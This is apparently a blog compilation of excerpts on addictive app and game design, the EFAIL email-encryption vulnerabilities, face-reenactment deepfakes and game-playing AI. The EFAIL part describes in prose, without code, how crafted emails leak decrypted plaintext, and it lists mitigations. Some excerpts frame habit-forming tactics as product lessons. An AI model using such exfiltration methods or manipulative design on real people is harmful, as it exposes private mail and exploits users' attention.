How programmers addict you to social media, games and your mobile phone

If you look at the current climate, the largest companies are the ones that hook you into their channel, whether it is a game, a website, shopping or social media. Quite a lot of research has been done in to how much time we spend watching TV and looking at our mobiles, showing differing numbers, all of which are surprisingly high. The New York Post says Americans check their phones 80 times per day, The Daily Mail says 110 times, Inc has a study from Qualtrics and Accel with 150 times and Business Insider has people touching their phones 2617 times per day.

This is nurtured behaviour and there is quite a bit of study on how they do this exactly

Social Networking Sites and Addiction: Ten Lessons Learned (academic paper)
Online social networking sites (SNSs) have gained increasing popularity in the last decade, with individuals engaging in SNSs to connect with others who share similar interests. The perceived need to be online may result in compulsive use of SNSs, which in extreme cases may result in symptoms and consequences traditionally associated with substance-related addictions. In order to present new insights into online social networking and addiction, in this paper, 10 lessons learned concerning online social networking sites and addiction based on the insights derived from recent empirical research will be presented. These are: (i) social networking and social media use are not the same; (ii) social networking is eclectic; (iii) social networking is a way of being; (iv) individuals can become addicted to using social networking sites; (v) Facebook addiction is only one example of SNS addiction; (vi) fear of missing out (FOMO) may be part of SNS addiction; (vii) smartphone addiction may be part of SNS addiction; (viii) nomophobia may be part of SNS addiction; (ix) there are sociodemographic differences in SNS addiction; and (x) there are methodological problems with research to date. These are discussed in turn. Recommendations for research and clinical applications are provided.

Hooked: How to Build Habit-Forming Products (Book)
Why do some products capture widespread attention while others flop? What makes us engage with certain products out of sheer habit? Is there a pattern underlying how technologies hook us?

Nir Eyal answers these questions (and many more) by explaining the Hook Model—a four-step process embedded into the products of many successful companies to subtly encourage customer behavior. Through consecutive “hook cycles,” these products reach their ultimate goal of bringing users back again and again without depending on costly advertising or aggressive messaging.

7 Ways Facebook Keeps You Addicted (and how to apply the lessons to your products) (article)

One of the key reasons for why it is so addictive is “operant conditioning”. It is based upon the scientific principle of variable rewards, discovered by B. F. Skinner (an early exponent of the school of behaviourism) in the 1930’s when performing experiments with rats.

The secret?

Not rewarding all actions but only randomly.

Most of our emails are boring business emails and occasionally we find an enticing email that keeps us coming back for more. That’s variable reward.

That’s one way Facebook creates addiction

Behavioral Game Design (article)

Every computer game is designed around the same central element: the player. While the hardware and software for games may change, the psychology underlying how players learn and react to the game is a constant. The study of the mind has actually come up with quite a few findings that can inform game design, but most of these have been published in scientific journals and other esoteric formats inaccessible to designers. Ironically, many of these discoveries used simple computer games as tools to explore how people learn and act under different conditions.

The techniques that I’ll discuss in this article generally fall under the heading of behavioral psychology. Best known for the work done on animals in the field, behavioral psychology focuses on experiments and observable actions. One hallmark of behavioral research is that most of the major experimental discoveries are species-independent and can be found in anything from birds to fish to humans. What behavioral psychologists look for (and what will be our focus here) are general “rules” for learning and for how minds respond to their environment. Because of the species- and context-free nature of these rules, they can easily be applied to novel domains such as computer game design. Unlike game theory, which stresses how a player should react to a situation, this article will focus on how they really do react to certain stereotypical conditions.

What is being offered here is not a blueprint for perfect games, it is a primer to some of the basic ways people react to different patterns of rewards. Every computer game is implicitly asking its players to react in certain ways. Psychology can offer a framework and a vocabulary for understanding what we are already telling our players.

5 Creepy Ways Video Games Are Trying to Get You Addicted (article)

The Slot Machine in Your Pocket (brilliant article!)

When we get sucked into our smartphones or distracted, we think it’s just an accident and our responsibility. But it’s not. It’s also because smartphones and apps hijack our innate psychological biases and vulnerabilities.

I learned about our minds’ vulnerabilities when I was a magician. Magicians start by looking for blind spots, vulnerabilities and biases of people’s minds, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano. And this is exactly what technology does to your mind. App designers play your psychological vulnerabilities in the race to grab your attention.

I want to show you how they do it, and offer hope that we have an opportunity to demand a different future from technology companies.

If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.

There is also a backlash to this movement.

How Technology is Hijacking Your Mind — from a Magician and Google Design Ethicist

I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.

Humantech.com

Technology is hijacking our minds and society.

Our world-class team of deeply concerned former tech insiders and CEOs intimately understands the culture, business incentives, design techniques, and organizational structures driving how technology hijacks our minds.

Since 2013, we’ve raised awareness of the problem within tech companies and for millions of people through broad media attention, convened top industry executives, and advised political leaders. Building on this start, we are advancing thoughtful solutions to change the system.

Why is this problem so urgent?

Technology that tears apart our common reality and truth, constantly shreds our attention, or causes us to feel isolated makes it impossible to solve the world’s other pressing problems like climate change, poverty, and polarization.

No one wants technology like that. Which means we’re all actually on the same team: Team Humanity, to realign technology with humanity’s best interests.

What is Time Well Spent (Part I): Design Distinctions

With Time Well Spent, we want technology that cares about helping us spend our time, and our lives, well – not seducing us into the most screen time, always-on interruptions or distractions.

So, people ask, “Are you saying that you know how people should spend their time?” Of course not. Let’s first establish what Time Well Spent isn’t:

It is not a universal, normative view of how people should spend their time
It is not saying that screen time is bad, or that we should turn it all off.
It is not saying that specific categories of apps (like social media or games) are bad.

EFAIL: PGP and S/MIME (encrypted email) are no longer safe

EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails.
Email is a plaintext communication medium whose communication paths are partly protected by TLS (TLS). For people in hostile environments (journalists, political activists, whistleblowers, …) who depend on the confidentiality of digital communication, this may not be enough. Powerful attackers such as nation state agencies are known to eavesdrop on email communications of a large number of people. To address this, OpenPGP offers end-to-end encryption specifically for sensitive communication in view of these powerful attackers. S/MIME is an alternative standard for email end-to-end encryption that is typically used to secure corporate email communication.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

 

Direct Exfiltration

There are two different flavors of EFAIL attacks. First, the direct exfiltration attack abuses vulnerabilities in Apple Mail, iOS Mail and Mozilla Thunderbird to directly exfiltrate the plaintext of encrypted emails. These vulnerabilities can be fixed in the respective email clients. The attack works like this. The attacker creates a new multipart email with three body parts as shown below. The first is an HTML body part essentially containing an HTML image tag. Note that the src attribute of that image tag is opened with quotes but not closed. The second body part contains the PGP or S/MIME ciphertext. The third is an HTML body part again that closes the src attribute of the first body part.

The attacker now sends this email to the victim. The victim’s client decrypts the encrypted second body part and stitches the three body parts together in one HTML email as shown below. Note that the src attribute of the image tag in line 1 is closed in line 4, so the URL spans over all four lines.

The email client then URL encodes all non-printable characters (e.g., %20 is a whitespace) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim’s email client sends the plaintext to the attacker.

The direct exfiltration EFAIL attacks work for encrypted PGP as well as S/MIME emails.

The CBC/CFB Gadget Attack

Second, we describe the novel CBC/CFB gadget attacks which abuse vulnerabilities in the specification of OpenPGP and S/MIME to exfiltrate the plaintext. The diagram below describes the idea of CBC gadgets in S/MIME. Because of the specifics of the CBC mode of operation, an attacker can precisely modify plaintext blocks if she knows the plaintext. S/MIME encrypted emails usually start with “Content-type: multipart/signed” so the attacker knows at least one full block of plaintext as shown in (a). She can then form a canonical plaintext block whose content is all zeros as shown in (b). We call the block pair X and C0 a CBC gadget. In step (c), she then repeatedly appends CBC gadgets to inject an image tag into the encrypted plaintext. This creates a single encrypted body part that exfiltrates its own plaintext when the user opens the attacker email. OpenPGP uses the CFB mode of operation, which has the same cryptographic properties as CBC and allows the same attack using CFB gadgets.

The difference here is that any standard-conforming client will be vulnerable and that each vendor may cook their own mitigations that may or may not prevent the attacks. Thus, in the long term, it is necessary to update the specification to find and document changes that fix the underlying root causes of the vulnerabilities.

While the CBC/CFB gadget attacks on PGP and S/MIME are technically very similar, the requirements for a successful attack differ substantially. Attacking S/MIME is straightforward and an attacker can break multiple (in our tests up to 500) S/MIME encrypted emails by sending a single crafted S/MIME email to the victim. Given the current state of our research, the CFB gadget attack against PGP only has a success rate of approximately one in three attempts. The reason is that PGP compresses the plaintext before encrypting it, which complicates guessing known plaintext bytes. We feel that this is not a fundamental limitation of the EFAIL attacks but more a technical hitch and that attacks become more efficient in future research.

Mitigations

Here are some strategies to prevent EFAIL attacks:

Short term: No decryption in email client. The best way to prevent EFAIL attacks is to only decrypt S/MIME or PGP emails in a separate application outside of your email client. Start by removing your S/MIME and PGP private keys from your email client, then decrypt incoming encrypted emails by copy&pasting the ciphertext into a separate application that does the decryption for you. That way, the email clients cannot open exfiltration channels. This is currently the safest option with the downside that the process gets more involved.

Short term: Disable HTML rendering. The EFAIL attacks abuse active content, mostly in the form of HTML images, styles, etc. Disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking EFAIL. Note that there are other possible backchannels in email clients which are not related to HTML but these are more difficult to exploit.

Medium term: Patching. Some vendors will publish patches that either fix the EFAIL vulnerabilities or make them much harder to exploit.

Long term: Update OpenPGP and S/MIME standards. The EFAIL attacks exploit flaws and undefined behavior in the MIME, S/MIME, and OpenPGP standards. Therefore, the standards need to be updated, which will take some time.

Source: EFAIL

Uh oh! Here’s yet more AI that creates creepy fake talking heads

Video Machine-learning experts have built a neural network that can manipulate facial movements in videos to create fake footage – in which people appear to say something they never actually said.

It could be used to create convincing yet faked announcements and confessions seemingly uttered by the rich and powerful as well as the average and mediocre, producing a new class of fake news and further separating us all from reality… if it works well enough, naturally.

It’s not quite like Deepfakes, which perversely superimposed the faces of famous actresses and models onto the bodies of raunchy X-rated movie stars.

Instead of mapping faces onto different bodies, though, this latest AI technology controls the target’s face, and manipulates it into copying the head movements and facial expressions of a source. In one of the examples, Barack Obama acts as the source and Vladimir Putin as the target. So it looks as though a speech given by Obama was instead given by Putin.

obama_putin_AI

Obama’s facial expressions are mapped onto Putin’s face using this latest AI technique … Image credit: Hyeongwoo Kim et al

A paper describing the technique, which popped up online at the end of last month, claims to produce realistic results. The method was developed by Hyeongwoo Kim, Pablo Garrido, Ayush Tewari, Weipeng Xu, Justus Thies, Matthias Nießner, Patrick Pérez, Christian Richardt, Michael Zollhöfer, and Christian Theobalt.

The Deepfakes Reddit forum, which has since been shut down, was flooded with people posting tragically bad computer-generated videos of celebs’ blurry and twitchy faces pasted onto porno babes using machine-learning software, with mismatched eyebrows and skittish movements. You could, after a few seconds, tell they were bogus, basically.

A previous similar project created a video of someone pretending to say something he or she hadn’t through lip-synching and an audio clip. Again, the researchers used Barack Obama as an example. But the results weren’t completely convincing since the lip movements didn’t always align properly.

That’s less of a problem with this new approach, however. It’s, supposedly, the first model that can transfer the full three-dimensional head position, head rotation, face expression, eye gaze and blinking from a source onto a portrait video of a target, according to the paper.

Controlling the target head

It uses a series of landmarks to reconstruct a face so it can track the head and facial movements to capture facial expressions for the input source video and output target video for every frame. A facial representation method computes the parameters of the face for both videos.

Next, these parameters are slightly modified and copied from the source to the target face for a realistic mapping. Synthetic images of the target’s face are rendered using an Nvidia GeForce GTX Titan X GPU.

The rendering part is where the generative adversarial network comes in. The training data comes from the tracked video frames of the target video sequence. The goal is to generate fake images that are as good as enough as the ones in the target video frames to trick a discriminator network.

Only about two thousand frames – which amounts to a minute of footage – is enough to train the network. At the moment, it’s only the facial expressions that can be modified realistically. It doesn’t copy the upper body, and cannot deal with backgrounds that change too much.

Source: Uh oh! Here’s yet more AI that creates creepy fake talking heads • The Register

AI learns to copy human gaming behaviour by watching Youtube

Deep reinforcement learning methods traditionally struggle with tasks where environment rewards are particularly sparse. One successful method of guiding exploration in these domains is to imitate trajectories provided by a human demonstrator. However, these demonstrations are typically collected under artificial conditions, i.e. with access to the agent’s exact environment setup and the demonstrator’s action and reward trajectories. Here we propose a two-stage method that overcomes these limitations by relying on noisy, unaligned footage without access to such data. First, we learn to map unaligned videos from multiple sources to a common representation using self-supervised objectives constructed over both time and modality (i.e. vision and sound). Second, we embed a single YouTube video in this representation to construct a reward function that encourages an agent to imitate human gameplay. This method of one-shot imitation allows our agent to convincingly exceed human-level performance on the infamously hard exploration games Montezuma’s Revenge, Pitfall! and Private Eye for the first time, even if the agent is not presented with any environment rewards.

Source: [1805.11592] Playing hard exploration games by watching YouTube

 
Skip to toolbar